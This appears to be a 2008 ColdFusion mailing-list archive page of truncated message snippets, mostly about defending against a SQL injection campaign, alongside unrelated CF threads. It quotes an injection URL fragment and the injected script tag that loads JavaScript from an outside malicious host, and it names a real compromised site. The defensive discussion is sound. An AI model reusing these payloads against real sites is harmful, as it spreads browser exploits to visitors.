Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Eeverything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
Dear ColdFusion Users,
Is there a way that I can attach to a datasource through an event like
before_commit or before_update?
So, if I have a cfquery tag, and I would ColdFusion to automatically, before
ColdFusion executes the code found in the cfquery I would like it to
automatically execute
Joseph,
I don't think what you are trying to do is possible. Can you give us some
more details of what you are trying to accomplish to see if we can help you
come up with an alternative solution?
Sincerely,
Dave Phillips
-Original Message-
From: Joseph Bugeja [mailto:[EMAIL PROTECTED]
Well you can use database triggers on tables for this matter, if your
queries are related to simple tables...
Greetings from Switzerland
Gert Franz
Railo Technologies GmbH
[EMAIL PROTECTED]
www.railo.ch
Join our Mailing List
german:http://de.groups.yahoo.com/group/railo/
english:
Im looking for milliseconds to shave off an app that creates XML
files. it consists fo a cfc that takes a bean with LOTS of getters
and setters, and makes an XML file out of it.
What i have now is a cfc that has 107 methods. Each method makes a
fragment of the XML file, with some conditional
Thanks for your reply. Let me explain our scenario.
We have a number of cfquery tags that insert, update and delete data from our
Oracle database. Basically, before each query is run I need to execute a stored
procedure. This stored procedure sets the userid (the user currently logged in)
in
Are you using components for all your data access transactions (ie.
dao, etc)? If so, and you are using ColdSpring (or some other bean
factory) to manage your cfcs, this would be a perfect place for AOP.
If you are not using a bean factory, you could create a lightweight
aop style function /
This attack has nothing to do with elevation of privilege. It simply
tacks on a SQL procedure to a query existing on the page already. This
procedure then runs through the tables/columns in the database
appending text the end of content in varchar fields. The text appended
varies, but what I've
Even if you split it out, would the processing page not still end up calling
the same amount of methods unless you could redesign the build process
somehow? I sometimes wonder if speed is the ultimate goal and at any cost
if it might just be better to use included files with UDFs when needed over
Joseph,
I think Gert's suggestion earlier could work for you. You could design a
trigger to fire the stored procedure prior to any Inserts or Updates. Check
out this page on oracle site for some direction:
http://tinyurl.com/5sjhlg
I haven't done anything with triggers myself. But if you
Richard,
You may want to check out the documentation on application.cfc before going any
further...
Gary
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
You could make them fire based upon a null value or value not being set at
all. For example if UserID is in fact passed in then do not fire trigger
but if UserID is not passed in then fire the trigger. I think that would
then work fine for the CF pages interacting with things and then when
Thanks again for your reply.
Unfortunately, I need to pass the userid prior to executing each query as
otherwise the auditing function would not know the userid. We have triggers on
tables but triggers need the read the userid apriori.
ColdFusion does not allow us to build our connection
The logic has 3 or 4 major branches, so the total number of methods
called is about a third or a quarter of the total.
So the choice is to instantiate one 3000 line cfc with 107 methods
only some fo which get used, against 2 or 3 smaller cfcs where al the
methods get used.
So does anyone have an
The purpose of the hack is to change your website, so that each visitor is
hit with a series of browser exploit attempts while reading your website.
Some of the exploits attempted are handled by the MS patch. Some are not.
(Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton,
Got it. Now I understand better. You want to pass the userid of your
'logged in user' to track the change in the database instead of using the
user id that the datasource is logged in as.
I don't see any way for you to do this without changing your code. Maybe
someone else can come up with
Are you storing the XML as a string or using a the native CF XML object?
When working with large strings, I've obtained big speed increases by using
a Java String Buffer object.
On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote:
The logic has 3 or 4 major branches, so the total
I know when one of our guys decided to take a complex series of included
files and put it into 4 CFCs to make things easier to manage that the pages
actually slowed down. When he started to back track through things it
appeared the added overhead was from all of the method calls he was then
Exactly!
You perfectly understood my concern. If ColdFusion supported dynamic connection
parameter injection or proxy authentication then we can identify the connection
pool users but there is no straightforward solution to this. Through pooling we
are connected through one db user which for
http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.html
Well, thanks. That worked to get me the number of the character. It's 8226.
That will help.
I have to add, this is the second time I've copied a routine directly from
the Adobe web site, and it's the second time it
No, because those sites are still using the URL variables, just not visibly.
andy
-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 3:39 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Here's another
Just a guess but it sounds more like the CF's infamous string manipulation
memory issue than a CFC issue. This issue, and various work a-rounds, was
covered in great detail on CF talk about a month or so ago. I would do a
search on the cf_talk list looking for Memory issue string manipulation
java
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
your site.
http://portcullis.riaforge.org/
--
Portcullis is a CFC based url,form,cookie filter to help protect against SQL
Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter
Joseph,
I did some googling and found that Oracle has 'proxy user authentication'.
See this Ask Tom article (someone wanting to do the same thing as you are,
but in java):
http://tinyurl.com/6qe8xk
Although I don't know if you can do it with the ColdFusion setup directly,
but maybe you can
Hi
cfdump with a cfc shows the methods of the cfc. Is there an easy way to
see the values stored in CFC? Does it work recursively, so if a cfc
member points to another cfc instance, then that cfc is dumped in the
same way?
We're on cfmx 6 and also 7.
Thanks
Mark
Let me just jump in with a quick question or two about this...
Is this something that using cfqueryparam doesn't take care of?
Is this a serious enough problem that we need to use such measures
as Portcullis to defend our sites?
I do see form injection attempts at times through forms on my
Similar to how other people store instance data, I create a CFC-based
struct variable, usually named instance. Then, I create a
getInstance() function that returns the instance struct.
It will show me everything stored at the point in time the struct
variable is dumped.
It's not recursive,
Dave,
That's exactly what I was looking for - proxy authentication. I created a
thread on this forum about this but the reply I got is that ColdFusion does not
natively support this. So, the solution is to either create our own JNDI
datasource using Java. However, I decided to not go this way
Why not just set it in their session and then you are only setting it once
and referencing that for each query you execute.
On Tue, Jul 22, 2008 at 9:06 AM, Joseph Bugeja [EMAIL PROTECTED] wrote:
Dave,
That's exactly what I was looking for - proxy authentication. I created a
thread on this
Hominid: Any member of the biological family Hominidae (the great apes),
including the extinct and extant humans, chimpanzees, gorillas, and
orangutans.
Thank you.
Adrian :OD
-Original Message-
From: Brian Kotek [mailto:[EMAIL PROTECTED]
Sent: 03 June 2008 21:08
To: CF-Talk
Subject: Re:
Hello folks:
The discussion yesterday regarding using CFqueryparam to protect sites from
SQL Injection attacks got me thinking. Well, it is easy enough to use
CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed
to the SQL query.
However, how do you do that with
Why not pass both to the proc, then rewrite the proc so that rather than
testing for it's existence, you're testing for whether or not it's blank?
-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 9:21 AM
To: CF-Talk
Subject: writing protected CF
Yup, you're making sense. The way around it is to pass NULL in using:
cfprocparam null=true
Adrian
-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED]
Sent: 22 July 2008 15:21
To: CF-Talk
Subject: writing protected CF with CFStoredProc
Hello folks:
The discussion yesterday
Is there an easy way to see the values stored in CFC?
In my CFCs I place all instance variables into an instance struct. Then I
can use:
cffunction name=getMemento access=public returntype=Struct
output=false
cfargument name=collection type=struct required=false
default=#structNew()#
What's wrong with using:
cfquery ...
exec sps_testproc
cfif whichvar = A
@aid=cfqueryparam value=123 cfsqltype=cf_sql_integer
cfelse
@bid=cfqueryparam value=456 cfsqltype=cf_sql_integer
/cfif
/cfquery
Oh yeah, you are right, of course. There is no NULL in CF so if I do a
Value=NULL that will only confuse SQL.
Cool, thanks!
On Tue, Jul 22, 2008 at 10:27 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:
Yup, you're making sense. The way around it is to pass NULL in using:
cfprocparam null=true
True! I can certainly do this as well.
On Tue, Jul 22, 2008 at 10:40 AM, morgan l [EMAIL PROTECTED] wrote:
What's wrong with using:
cfquery ...
exec sps_testproc
cfif whichvar = A
@aid=cfqueryparam value=123 cfsqltype=cf_sql_integer
cfelse
In your example you are altering the behavior of the query based upon input
which does not affect injection attacks. The idea of protecting against
injection attacks is to stop invalid values from being executed within the
query/SP.
Take for example this query:
delete from customer where
Mark,
I went to your site Coldfusionmuse to read about that attack. I then noticed
the link to cfwebtools at the top. Needing some help with a project, I looked
at one of the sites they helped create only to see that same SQL injection
attack had succeeded on the site (www.rentiowa.com).
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to
see what Brian was talking about and now I see the reference to a .js file
on one of the pages. I didn't just infect my pc with something, did I?
I surely hope that we are not perpetuating some virus with these e-mails.
Yes, it sucks that the option is not available for the entire band. For it to
suppress the footer, you have to set all of the fields' Remove line when
blank property to true in the footer section. Also if there is blank space
between your fields/lines try adding dummy labels with just a space
Yes, it sucks that the option is not available for the entire band. For it to
suppress the footer, you have to set all of the fields' Remove line when
blank property to true in the footer section. Also if there is blank space
between your fields/lines try adding dummy labels with just a space
Yes, I'll work on something like that but it requires heavy testing to make
sure that the solution is correct. Pooling is quite a difficult topic and not
very much documented topic (I could not find a document that explains how the
ColdFusion driver is communicating with Oracle - like what if
Okay, stupidly, I clicked on rent.com (? Used to avoid
perpetuation) to see what Brian was talking about and now I
see the reference to a .js file on one of the pages. I
didn't just infect my pc with something, did I?
I surely hope that we are not perpetuating some virus with
I went to your site Coldfusionmuse ...
Please send vulnerability discoveries to the appropriate individuals, not to
mailing lists.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in
Brian and all,
I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem is that like a lot of dev shops - we don't keep
up with our portfolio of customers on our own web site. I have removed the
link to Rent Iowa. They have not been an active customer
It's ok dave... I put myself out there after all
-mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 2:09 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma
rk Kruger
I went to your site
i have been asked to look at a possible sql injection attack. as I look
through the code I see stored procs being called by using cfquery like:
cfquery name=asdf datasource=asdf
storedproc '#var1#', '#var2#'
cfquery
I've read about using cfstored procs and params to prevent
Yes you are vulnerable if you do not sanitize the inputs.
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Tim Do [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 2:28 PM
To: CF-Talk
Subject:
As you have heard, cfquery is vulnerable to sql injection attacks, so
you have to do something.
You will hear that cfqueryparam is the best practice for protecting
against sql injection attacks, and there is certainly truth to that.
However, there are also costs associated with cfqueryparam.
(Depending
on the version of CF, cfqueryparam disables cachedwithin caching.
This is true, but it doesn't prevent you from baking your own caching
mechanism as many have done.
In
all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no
A couple of approaches to order by
http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-
by
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
I've used this function to view the SQL with the param data in place.
cffunction name=executedSQL
cfargument name=result
cfset var LOCAL = {}
cfset LOCAL.sqlString = ARGUMENTS.result.sql
cfif StructKeyExists(ARGUMENTS.result, sqlParameters)
you are correct Dave..
Mark..I apologize for my post. I thought it was interesting following the
links from the original thread to see a site with that exact attack.
Brian
I went to your site Coldfusionmuse ...
Please send vulnerability discoveries to the appropriate individuals, not to
Mark,
I apologize for posting it the way I did. I did find it interesting finding
the exact attack on a site that was being discussed in the thread. Please
forgive me.
Brian
Brian and all,
I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem
Brian,
No worries. You just cost me an hour of my life approving changes to our
portfolio section (ha).
-mark
-Original Message-
From: Brian Yager [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 3:52 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My
Hi Brad
Thanks for the links, those are interesting articles.
The problem with MS SQL Profiler and cfqueryparam is that the sql that
arrives at the sql server replaces the literal sql with something like
sp_exec 72 (I forget the actual sp name) followed by the parameters
(which are easily
Thanks Adrian. That's cool. however, it is not useful DURING the execution
of the SQL though correct?
~Brad
- Original Message -
From: Adrian Lynch [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July 22, 2008 3:51 PM
Subject: RE: cfquery and cfstoredproc
I tracked down a defect to a piece of code which basically did the
following:
total = form.quantity * form.itemamount
In some cases, form.quantity is commong through as *1,1* which is presumably
due to an HTML issue with duplicate form fields with the same name.
But rather than getting a CF
I see. Thanks for the clarification on the Profiler stuff. Unfortunately, I
don't MSSQL in front of me to play with it right now.
I give SeeFusion two thumbs way up on monitoring your SQL traffic and run
times. (it incorporates a JDBC URL wrapper) I use a custom monitor I wrote
for SQL
Looked like it could be a ColdFusion date value to me. So I did a
dateFormat() on that and came up with 01/01/2008:
cfset nValue = 1,1 * 1
cfoutput#dateFormat(nValue,mm/dd/)#brbr/cfoutput
It's assuming 1,1 is the current month and year. I did the same for
5,23 * 1 and got 05/23/2008.
i have been asked to look at a possible sql injection attack.
as I look through the code I see stored procs being called
by using cfquery like:
cfquery name=asdf datasource=asdf
storedproc '#var1#', '#var2#'
cfquery
I've read about using cfstored procs and params
Dave,
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Dave Watts
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
It wouldn't allow any of the values after the stored procedure call
storedproc to run as code, because they would be placed in the input
parameters of the stored
So I'm hearing that it should be fine??
Somehow their database columns values were appended the following string
: /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So for example the column firstname value was John became:
John/titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So I'm hearing that it should be fine??
Somehow their database columns values were appended the
following string
: /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So for example the column firstname value was John became:
John/titleInvalidTag
The discussion yesterday regarding using CFqueryparam to
protect sites from SQL Injection attacks got me thinking.
Well, it is easy enough to use CFQUERYPARAM everywhere inside
CFQUERY tags, wherever a variable is passed to the SQL query.
However, how do you do that with CFStoredProc?
Dave,
I never disagree with you (usually a fools errand) but I want a
clarification. I think you might mean that this particular use is safe
because CF will escape the single quotes. But the code below is vulnerable
in exactly the same as a CFQUERY.
As a test I created an SP
I should have spotted that: i noticed that the difference between 0,1 and
0,2 and 0,3 were 31, 29 and 31, etc. And also that the sequences jumped when
the numbers went from 12 to 13, and likewise around 30. And also leaps of
365 and 366 between 1,32 and 1,33 and 1,34 etc.
So CF is saying, well,
I never disagree with you (usually a fools errand)
Ha! I wish.
but I want a clarification. I think you might mean that this
particular use is safe because CF will escape the single quotes.
But the code below is vulnerable in exactly the same as a CFQUERY.
As a test I created an SP
Say you had a proc that looked like this:
CREATE PROC sps_testproc
@AID int = null,
@BID int = null
as
IF @AID is not null
SELECT @AID
IF @AID is not NULL
SELECT @BID
If I was using CFQUERY, unprotected-style, I might write this:
cfquery ...
So I'm hearing that it should be fine??
Somehow their database columns values were appended the following
string
: /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
So for example the column firstname value was John became:
John/titleInvalidTag
Dave,
Do you mind if I blog about that part where you said Yeah, your right about
that That's got to be good for my cf_streetCred (ha).
-mk
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 7:14 PM
To: CF-Talk
Subject: RE: cfquery and
Given the nature of this thread, ad hominid attacks is one of the best
Freudian/spell check slip(s) in hominid history.
~G~
On Tue, Jul 22, 2008 at 10:11 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:
Hominid: Any member of the biological family Hominidae (the great apes),
including the extinct
Doooh!
I just got through cleaning the results of this attack out of a clients
database! They have a very old CF application that was poorly written and has
no cfqueryparams!
I must have cleaned 10 tables so far... Funny part is, I warned my client
several months ago after seeing
I'll admit it. The first time Dave conceded I was right about something, it
got printed out and stuck on my cubicle wall.
Hey, I gotta' celebrate *something* :)
~Brad
- Original Message -
From: Mark Kruger [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Actually, I'm gonna pick on you again Dave and challenge this. (I'm
We have an immediate need for a Web Applications Developer. It will be a 3
month project working on several client projects. Position will be primarily
based in the Alexandria, VA office, but that may change to DC Department of
Transportation at the Navy Yard metro. Need to be able to go to
78 matches
Mail list logo